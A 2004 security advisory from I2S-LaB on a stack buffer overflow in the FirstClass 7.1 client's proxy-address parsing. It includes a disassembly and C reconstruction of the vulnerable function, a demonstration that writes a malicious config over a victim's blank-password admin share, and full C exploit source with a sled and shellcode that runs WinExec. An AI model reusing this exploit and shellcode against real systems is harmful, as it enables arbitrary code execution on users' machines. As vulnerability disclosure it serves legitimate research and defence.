###########################################################################################
~ I2S LAB Security Advisory ~
###########################################################################################
http://www.I2S-LAB.com
Affected system : Server / Client FirstClass version 7.1
Editor / Vendor : Open Text, http://www.centrinity.com
Impact : Malicious code execution
Bug discovery : October 30, 2003
Risk analysis : December 10, 2003
Patch development by I2S-LaB : December 16, 2003
Vendor notified : March 15, 2004
Vendor response : March 30, 2004
Official publication : April 07, 2004
Description
___________
FirstClass is a complete network service software suite and an attractive alternative to Microsoft Exchange or Lotus Notes.
In order to use FirstClass, users must have a client installed on their computer (or other devices such as PDAs...),
which is downloadable at the following address :
http://www.centrinity.com/ClientDownloads/
Technicals details
__________________
The FirstClass client suffers from a stack-based buffer overflow that allows an attacker to execute arbitrary
code in the context of the logged-in user, without the user noticing anything, as soon as they click the "LOGIN" button.
The problem comes from the "LOCAL NETWORK.FCP" settings file, whose "PROXYADDR" value is copied into fixed-size
stack buffers without any length check (function FCPProxyIPLong, see below). The file is plain text in the client's
installation directory: anyone who can write to it, locally or remotely (e.g. through a writable share, as in the
demonstration below), can force the user to run a command of their choosing the next time they log in.
==============================================================================
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\>type "c:\Program Files\FirstClass\fcp\Local Network.FCP"
PROXYPORT = 1080
PROXYADDR = "AAAAAAAAAAAAAAAABBBB"
CONNTYPE = 8
FCPENCRYPT = 1
DLSEND = 0
DLERRS = 0
DLRCV = 0
MDMDBG = 0
SLDBG = 0
TCPTXWIN = 10000
TCPRXBUF = 10000
TCPREMPORT = 510
C:\>c:\Program Files\FirstClass\Fcc32.exe
=============================================================================
This exception may be expected and handled.
eax=00000000 ebx=00000093 ecx=fffffffd edx=00000003 esi=00000075 edi=00c3c3f0
eip=42424242 esp=0012f720 ebp=41414141 iopl=0 nv up ei pl nz ac pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010212
42424242 ?? ???
0:000> dd esp
0012f720 00c4a600 00c4a5d0 00000000 0012f798
0012f730 0054dae9 0012f8d8 00000000 00000280
0012f740 00c4a5d0 78478191 78469640 ffffffff
0012f750 00000004 022d6538 00c20000 0066024c
0012f760 00c4a5d0 00c4a5d0 022dc858 0012f77c
0012f770 0056ca34 022dc858 00000000 0012f78c
0012f780 00550a4f 022dc858 00000001 0012f8f8
0012f790 006229fd ffffffff 0012f7b4 0056c5e8
EIP = 42424242: the four "B"s at offset 16 of the PROXYADDR value landed on the saved return address, and the
four "A"s just before them on the saved EBP (ebp=41414141). The frame layout in the disassembly below explains the
offset: each dotted-quad token is strcpy()'d into an 8-byte slot at [ebp-0Ch], followed by the 4-byte result,
the saved EBP and the return address (8 + 4 + 4 + 4 = 20 bytes). The code clearly expected PROXYADDR to hold
at most an "xxx.xxx.xxx.xxx" address and never checks the actual length.
Here is the vulnerable function :
==============================================================================
00401000 ; File Name : C:\Program Files\FirstClass\Fcc32.exe
00401000 ; Format : Portable executable for IBM PC (PE)
00401000 ; Section 1. (virtual address 00001000)
00401000 ; Virtual size : 00224175 (2244981.)
00401000 ; Section size in file : 00225000 (2248704.)
00401000 ; Offset to raw data for section: 00001000
00401000 ; Flags 60000020: Text Executable Readable
00401000 ; Alignment : 16 bytes ?
00401000 ; OS type : MS Windows
00401000 ; Application type: Executable 32bit
00401000
00401000
00401000 model flat
00401000
00401000 ; ---------------------------------------------------------------------------
005620DA ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦
005620DA
005620DA
005620DA ; long __cdecl FCPProxyIPLong(unsigned char *)
005620DA ; Attributes: bp-based frame
005620DA ;
005620DA ; Converts a dotted-quad proxy address into a 4-byte value, one octet at a
005620DA ; time.  Only caller visible here: CSerWTCP::Init (see CODE XREF).
005620DA ;
005620DA ; Frame layout (from the ebp-relative offsets used below):
005620DA ;   [ebp+8]    input string (unsigned char *)
005620DA ;   [ebp-50h]  work copy of the input, 0x40 bytes up to [ebp-10h]
005620DA ;   [ebp-10h]  1-byte octet value written by "mov [ebp-10h], al"
005620DA ;   [ebp-0Ch]  per-octet token buffer: 8 bytes before the result dword
005620DA ;   [ebp-4]    4-byte result; octets stored at ebp-4, -3, -2, -1 in order
005620DA ;
005620DA ; Neither copy is bounded: pstrcpy writes the whole input into the 0x40-byte
005620DA ; work area, and each _strcpy below writes a strtok() token of any length
005620DA ; into the 8-byte slot at [ebp-0Ch].  A 20-byte token fills that slot (8),
005620DA ; the result (4), the saved ebp (4) and the return address (4) -- which is
005620DA ; exactly the ebp=41414141 / eip=42424242 crash shown above.
005620DA
005620DA public ?FCPProxyIPLong@@YAJPAE@Z
005620DA ?FCPProxyIPLong@@YAJPAE@Z proc near ; CODE XREF: CSerWTCP::Init(tCfgRec *,int)+22Ap
005620DA push ebp
005620DB mov ebp, esp
005620DD sub esp, 50h ; 0x50 bytes of locals
005620E0 mov eax, [ebp+8] ; input string
005620E3 push eax
005620E4 lea ecx, [ebp-50h]
005620E7 push ecx
005620E8 call ?pstrcpy@@YAXPAEPBE@Z ; pstrcpy(uchar *,uchar const *) -- unbounded copy into [ebp-50h]
005620ED add esp, 8
005620F0 push offset $SG29826_0 ; "\t.0.0.0.0." -- the leading \t (9) looks like a Pascal length byte for the 9 chars ".0.0.0.0."; appended so the four strtok() calls below always get a token
005620F5 lea edx, [ebp-50h]
005620F8 push edx
005620F9 call ?pstrcat@@YAXPAEPBE@Z ; pstrcat(uchar *,uchar const *)
005620FE add esp, 8
00562101 lea eax, [ebp-50h]
00562104 push eax
00562105 call ?PtoCstr@@YAPADPAE@Z ; PtoCstr(uchar *) -- Pascal -> C string, in place
0056210A add esp, 4
0056210D push offset $SG29828 ; "."
00562112 lea ecx, [ebp-50h]
00562115 push ecx
00562116 call _strtok ; token 1 (no NULL check on the result)
0056211B add esp, 8
0056211E push eax
0056211F lea edx, [ebp-0Ch]
00562122 push edx
00562123 call _strcpy ; OVERFLOW: token of any length into the 8-byte slot at [ebp-0Ch]
00562128 add esp, 8
0056212B lea eax, [ebp-0Ch]
0056212E push eax
0056212F call _atoi
00562134 add esp, 4
00562137 mov [ebp-10h], al ; keep the low byte only; values > 255 wrap silently
0056213A push 1
0056213C lea ecx, [ebp-10h]
0056213F push ecx
00562140 lea edx, [ebp-4]
00562143 push edx
00562144 call _memcpy ; result byte 0 = octet 1
00562149 add esp, 0Ch
0056214C push offset $SG29831 ; "."
00562151 push 0
00562153 call _strtok ; token 2 (continues on the same buffer)
00562158 add esp, 8
0056215B push eax
0056215C lea eax, [ebp-0Ch]
0056215F push eax
00562160 call _strcpy ; same unbounded copy as above
00562165 add esp, 8
00562168 lea ecx, [ebp-0Ch]
0056216B push ecx
0056216C call _atoi
00562171 add esp, 4
00562174 mov [ebp-10h], al
00562177 push 1
00562179 lea edx, [ebp-10h]
0056217C push edx
0056217D lea eax, [ebp-3]
00562180 push eax
00562181 call _memcpy ; result byte 1 = octet 2
00562186 add esp, 0Ch
00562189 push offset $SG29834 ; "."
0056218E push 0
00562190 call _strtok ; token 3
00562195 add esp, 8
00562198 push eax
00562199 lea ecx, [ebp-0Ch]
0056219C push ecx
0056219D call _strcpy ; same unbounded copy as above
005621A2 add esp, 8
005621A5 lea edx, [ebp-0Ch]
005621A8 push edx
005621A9 call _atoi
005621AE add esp, 4
005621B1 mov [ebp-10h], al
005621B4 push 1
005621B6 lea eax, [ebp-10h]
005621B9 push eax
005621BA lea ecx, [ebp-2]
005621BD push ecx
005621BE call _memcpy ; result byte 2 = octet 3
005621C3 add esp, 0Ch
005621C6 push offset $SG29837 ; "."
005621CB push 0
005621CD call _strtok ; token 4
005621D2 add esp, 8
005621D5 push eax
005621D6 lea edx, [ebp-0Ch]
005621D9 push edx
005621DA call _strcpy ; same unbounded copy as above
005621DF add esp, 8
005621E2 lea eax, [ebp-0Ch]
005621E5 push eax
005621E6 call _atoi
005621EB add esp, 4
005621EE mov [ebp-10h], al
005621F1 push 1
005621F3 lea ecx, [ebp-10h]
005621F6 push ecx
005621F7 lea edx, [ebp-1]
005621FA push edx
005621FB call _memcpy ; result byte 3 = octet 4
00562200 add esp, 0Ch
00562203 mov eax, [ebp-4] ; return the assembled 4-byte address
00562206 mov esp, ebp
00562208 pop ebp ; saved ebp already clobbered if a token overflowed the slot
00562209 retn ; returns to whatever now sits in the return-address slot (the unofficial patch below hooks this byte)
00562209 ?FCPProxyIPLong@@YAJPAE@Z endp
00562209
00562209 ; ---------------------------------------------------------------------------
This function is FirstClass's own equivalent of inet_addr() from the winsock library:
/*
* unsigned long inet_addr ( const char FAR * cp );
*/
The following is an approximation of this function in C :
###########################################################################################
*******************************************************************************************
/*
 * Reconstruction of FCPProxyIPLong() from the disassembly above.
 * Parses "a.b.c.d" into a 4-byte value, one octet per byte, first octet in
 * the lowest byte.
 *
 * Two copies are unbounded:
 *   - lstrcpy(temp, data): the whole PROXYADDR value into the fixed buffer
 *     temp (the binary reserves 0x40 bytes for it at [ebp-50h]);
 *   - lstrcpy(cIP, p): each strtok() token into cIP (8 bytes at [ebp-0Ch] in
 *     the binary, declared as 3 here).  A single 20-byte token with no '.'
 *     reaches the saved EBP and the return address, which is what the crash
 *     above shows.
 * Differences from the binary: the real code first appends ".0.0.0.0." so
 * that strtok() always returns four tokens, and unrolls the loop four times.
 * A fixed version would bound both copies (e.g. lstrcpyn with sizeof) and
 * reject any token longer than three digits.
 */
long __cdecl FCPProxyIPLong(unsigned char *data)
{
char temp[16], cIP[3], *p;   /* fixed-size; neither copy below is bounded */
DWORD dwIpConverted = 0;
BYTE sIP = 0;
int i = 0;
lstrcpy( temp, data );       /* overflow #1: no length check on data */
p = strtok( temp, "." );
while( p && i < 4 )
{
lstrcpy( cIP, p );           /* overflow #2: token length is attacker-controlled */
sIP = atoi( cIP );           /* truncated to one byte; values > 255 wrap */
memcpy( (BYTE *)&dwIpConverted + i, (BYTE *)&sIP , 1);  /* byte i = octet i */
p = strtok( NULL, ".");
i++;
}
return dwIpConverted;
}
*******************************************************************************************
###########################################################################################
If you pay attention to the following lines:
-> char temp[16];
-> lstrcpy( temp, data );
you will recognize a classic programming mistake: if "data" contains more than 16 bytes, the copy writes past the
end of the buffer and overwrites whatever follows it on the stack. Note that the second copy, lstrcpy( cIP, p ),
is unbounded in exactly the same way, and it is the one that reaches the saved EBP and the return address with a
20-byte value (see the frame layout in the disassembly): a correct fix must bound both copies and reject any
token longer than three digits.
demonstration
_____________
C:\>net use * \\victim\c "" /user:"administrateur"
F: drive is now connected to \\victim\C
Command ended successfully.
C:\>dir "f:\Program Files\FirstClass\Fcp"
Volume in F: drive has no name.
Volume serial number is 44DD-C75F
Directory of F:\Program Files\FirstClass\Fcp
07/01/2004 16:29
.
07/01/2004 16:29 ..
06/06/2002 10:45 302 Dialup Internet.FCP
09/09/1999 10:36 183 High-Speed Internet.FCP
09/09/1999 10:35 190 Internet.FCP
09/09/1999 10:36 183 Local Network.FCP
4 files(s) 858 octets
2 Dirs) 1 007 112 192 octets libres
C:\>type "f:\Program Files\FirstClass\Fcp\Local Network.FCP"
PROXYPORT = 1080
PROXYADDR = "0.0.0.0"
CONNTYPE = 8
FCPENCRYPT = 1
DLSEND = 0
DLERRS = 0
DLRCV = 0
MDMDBG = 0
SLDBG = 0
TCPTXWIN = 10000
TCPRXBUF = 10000
TCPREMPORT = 510
C:\>d:\code\exploits\FirstClass\FCexploit.exe
###############################################
FirstClass Client local buffer overflow Exploit
###############################################
Discovered & coded by I2S-LaB.
URL : http://www.I2S-LaB.com
MAIL : Contact[at]I2S-LaB.com
usage : d:\code\exploits\FirstClass\FCexploit.exe /RUN | /RESTORE [path to Local Network.FCP]
/RUN : launch the xploit against "Local Network.FCP"
/RESTORE : Restore the previous "Local Network.FCP"
[path to Local Network.FCP] : Optional,
define the path of the "Local Network.FCP" to exploit.
Default is C:\Program Files\FirstClass\Fcp\
C:\>d:\code\exploits\FirstClass\FCexploit.exe /run "f:\Program Files\FirstClass\Fcp"
###############################################
FirstClass Client local buffer overflow Exploit
###############################################
Discovered & coded by I2S-LaB.
URL : http://www.I2S-LaB.com
MAIL : Contact[at]I2S-LaB.com
Saving the Local Network file...ok
Opening the Local Network file...ok
Writing the Local Network File...ok
C:\>dir "f:\Program Files\FirstClass\Fcp"
Volume in F: drive has no name.
Volume serial number is 44DD-C75F
Répertoire de f:\Program Files\FirstClass\Fcp
07/01/2004 16:31 .
07/01/2004 16:31 ..
06/06/2002 10:45 302 Dialup Internet.FCP
09/09/1999 10:36 183 High-Speed Internet.FCP
09/09/1999 10:35 190 Internet.FCP
09/09/1999 10:36 183 Local Network.BAK
07/01/2004 16:31 2 750 Local Network.FCP
5 files(s) 3 608 octets
2 Dir(s) 1 007 108 096 octets libres
C:\>type "f:\Program Files\FirstClass\Fcp\Local Network.FCP"
CONNTYPE = 8
FCPENCRYPT = 1
DLSEND = 0
DLERRS = 0
DLRCV = 0
MDMDBG = 0
SLDBG = 0
TCPTXWIN = 10000
TCPRXBUF = 10000
TCPREMPORT = 510
PROXYPORT = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAÙGZ3 ïýWRWhExecOü´ ¿ûæWhEL32hKERNì]õS3 ü´XØØ ?ì]ÝSPfü¸Q?O ?j? u° ðfâ´L ÎÞ¦
calc.exe & "
PROXYADDR = "AAAAAAAAAAEEEEDD_u-
C:\>net use * /d
You own the following remote connections :
F: \\victime\c
The end of this operation will shut down connections
Do you wish to continue this operation ? (Y/N) [N] : y
The command ended successfully.
C:\>
As "victim" logs in FirstClass through the client, the calculator is launched.
Exploit
_______
/***********************************************************
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
###########################################################
# FirstClass Desktop 7.1 (latest) buffer overflow exploit #
###########################################################
Discovered and coded by I2S-LaB.
URL : http://www.I2S-LaB.com
contact : contact[at]I2S-LaB.com
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Compile it with cl.exe (VC++6)
************************************************************/
#include <windows.h>   // CreateFile, WriteFile, CopyFile, SetCurrentDirectory, lstrcmpi (header name reconstructed: lost in extraction)
#include <stdio.h>     // printf
#include <string.h>    // strlen
// Rewrites "Local Network.FCP" so that the FirstClass client overflows the
// per-octet token buffer in FCPProxyIPLong() the next time the user logs in.
//
// argv[1] : /RUN or /RESTORE (anything else, or nothing, prints the usage)
// argv[2] : optional directory holding the .FCP file (default: PATH below)
//
// Side effects: changes the current directory, backs the file up as
// "Local Network.BAK" (CopyFile with bFailIfExists=TRUE, so an existing backup
// is never overwritten) and rewrites "Local Network.FCP" in place.  The file
// handle is never closed; the process exits right after the write.
void main (int argc, char *argv[])
{
HANDLE FCP;
DWORD NumberOfBytesWritten;
unsigned char *p,
FC_FILE[] = "Local Network.FCP",
PATH[] = "C:\\Program Files\\FirstClass\\Fcp\\",
rawData[] =
/////////////////////////////////////////////////////////////////
// FC file data: the original harmless settings (CONNTYPE .. TCPREMPORT),
// then the opening quote of a PROXYPORT value.  PROXYPORT is used as the
// carrier for the sled + shellcode; PROXYADDR (at the end) is the value
// that actually overflows and redirects execution.
/////////////////////////////////////////////////////////////////
"\x43\x4F\x4E\x4E\x54\x59\x50\x45\x20\x3D\x20\x38\x0D\x0A\x46\x43"
"\x50\x45\x4E\x43\x52\x59\x50\x54\x20\x3D\x20\x31\x0D\x0A\x44\x4C"
"\x53\x45\x4E\x44\x20\x3D\x20\x30\x0D\x0A\x44\x4C\x45\x52\x52\x53"
"\x20\x3D\x20\x30\x0D\x0A\x44\x4C\x52\x43\x56\x20\x3D\x20\x30\x0D"
"\x0A\x4D\x44\x4D\x44\x42\x47\x20\x3D\x20\x30\x0D\x0A\x53\x4C\x44"
"\x42\x47\x20\x3D\x20\x30\x0D\x0A\x54\x43\x50\x54\x58\x57\x49\x4E"
"\x20\x3D\x20\x31\x30\x30\x30\x30\x0D\x0A\x54\x43\x50\x52\x58\x42"
"\x55\x46\x20\x3D\x20\x31\x30\x30\x30\x30\x0D\x0A\x54\x43\x50\x52"
"\x45\x4D\x50\x4F\x52\x54\x20\x3D\x20\x35\x31\x30\x0D\x0A\x50\x52"
"\x4F\x58\x59\x50\x4F\x52\x54\x20\x3D\x20\x22"
/////////////////////////////////////////////////////////////////
// MASS NOP LIKE : 'A' = inc ecx  (0x41), a sled execution can land
// anywhere in and slide down to the shellcode below.
/////////////////////////////////////////////////////////////////
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
/*
* Fcclient Specific shellcode [78 bytes]
*
* Self-contained except for two hard-coded import-table slots of Fcc32.exe,
* built by subtraction/xor so that the encoded bytes contain no NUL or '.':
*   edi = 0xFFFFFFFF - 0x9196A8FF = 0x6E695700  -> pushed as the bytes "\0Win"
*   edi = 0 - 0xFF9D9D58          = 0x006262A8  -> call [edi] (presumably GetModuleHandleA)
*   edi = (0x006262A8 ^ 0x0351) - 1 = 0x006261F8 -> call [edi] (presumably GetProcAddress)
* The pushes leave "KERNEL32\0WinExec\0" on the stack ([ebp-1C] and [ebp-13]);
* the jmp/call/pop pair puts the address of the "calc.exe & " text that
* follows the code into edx, and WinExec(cmd, SW_SHOWNORMAL=1) runs it.
* The final "sub di,4C / call edi" transfers to 0x006261AC *itself* (FF D7 is
* call edi, not call [edi]); the unofficial patch below uses that address as
* the ExitProcess import slot, so this appears to execute the IAT entry as
* code.  By then calc.exe has already been started, so the effect is cosmetic.
********************************************************************
:00401006 EB47 jmp 0040104F
:00401008 5A pop edx
:00401009 33FF xor edi, edi
:0040100B 8BEC mov ebp, esp
:0040100D 57 push edi
:0040100E 52 push edx
:0040100F 57 push edi
:00401010 6845786563 push 63657845
:00401015 4F dec edi
:00401016 81EFFFA89691 sub edi, 9196A8FF
:0040101C 57 push edi
:0040101D 68454C3332 push 32334C45
:00401022 684B45524E push 4E52454B
:00401027 8D5DE4 lea ebx, dword ptr [ebp-1C]
:0040102A 53 push ebx
:0040102B 33FF xor edi, edi
:0040102D 81EF589D9DFF sub edi, FF9D9D58
:00401033 FF17 call dword ptr [edi]
:00401035 8D5DED lea ebx, dword ptr [ebp-13]
:00401038 53 push ebx
:00401039 50 push eax
:0040103A 6681F75103 xor di, 0351
:0040103F 4F dec edi
:00401040 FF17 call dword ptr [edi]
:00401042 6A01 push 00000001
:00401044 FF75F8 push [ebp-08]
:00401047 FFD0 call eax
:00401049 6683EF4C sub di, 004C
:0040104D FFD7 call edi
:0040104F E8B4FFFFFF call 00401008
*********************************************************************
*
*/
"\xEB\x47\x5A\x33\xFF\x8B\xEC\x57\x52\x57\x68\x45\x78\x65\x63\x4F"
"\x81\xEF\xFF\xA8\x96\x91\x57\x68\x45\x4C\x33\x32\x68\x4B\x45\x52"
"\x4E\x8D\x5D\xE4\x53\x33\xFF\x81\xEF\x58\x9D\x9D\xFF\xFF\x17\x8D"
"\x5D\xED\x53\x50\x66\x81\xF7\x51\x03\x4F\xFF\x17\x6A\x01\xFF\x75"
"\xF8\xFF\xD0\x66\x83\xEF\x4C\xFF\xD7\xE8\xB4\xFF\xFF\xFF"
"calc.exe & " // to execute (WinExec gets this plus everything up to the next NUL, i.e. the rest of the file)
////////////////////////////////////////////////////////////////
// OTHER DATA: closing quote of PROXYPORT, line break, then
//   PROXYADDR = "AAAAAAAAAAEEEEDD
// a 16-byte token with no '.' so strtok() hands it to strcpy() whole.
////////////////////////////////////////////////////////////////
"\x22\x0A\x0D\x0A\x50\x52\x4F\x58\x59\x41\x44\x44\x52\x20"
"\x3D\x20\x22\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x45\x45\x45"
"\x45\x44\x44"
/////////////////////////////////////////////////////////////////
